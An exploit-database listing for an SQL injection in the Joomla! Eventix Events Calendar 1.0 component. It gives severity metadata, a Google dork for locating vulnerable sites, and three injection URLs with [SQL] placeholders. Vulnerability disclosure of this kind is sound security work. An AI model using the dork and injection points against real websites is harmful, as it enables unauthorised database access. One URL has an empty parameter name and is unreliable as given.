header-logo
Suggest Exploit
vendor:
Eventix Events Calendar
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Eventix Events Calendar
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:informafix:eventix_events_calendar:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component Eventix Events Calendar v1.0 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Eventix Events Calendar v1.0. An attacker can send a malicious SQL query to the vulnerable parameter 'selected_date' in 'index.php' file via the 'view' parameter to execute arbitrary SQL commands in application's database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Eventix Events Calendar v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_eventix
# Date: 21.02.2017
# Vendor Homepage: http://informafix.fr/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/eventix-events-calendar/
# Demo: http://demo.informafix.fr/index.php?option=com_eventix
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=[SQL]
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=[SQL]
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventssearch&=[SQL]
# # # # #